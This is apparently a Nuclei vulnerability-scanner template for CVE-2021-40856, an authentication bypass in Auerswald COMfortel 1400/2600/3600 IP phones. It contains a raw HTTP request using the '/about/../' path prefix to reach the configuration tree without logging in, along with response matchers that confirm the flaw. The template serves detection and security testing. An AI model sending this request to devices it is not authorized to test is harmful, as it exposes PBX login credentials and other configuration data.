nuclei-templates/cves/2021/CVE-2021-40856.yaml

38 lines
1.1 KiB
YAML

id: CVE-2021-40856
info:
name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
author: gy741
severity: medium
description: Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
reference:
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40856
tags: cve,cve2021,comfortel,auth-bypass
requests:
- raw:
- |
GET /about/../tree?action=get HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"TYPE"'
- '"ITEMS"'
- '"COUNT"'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200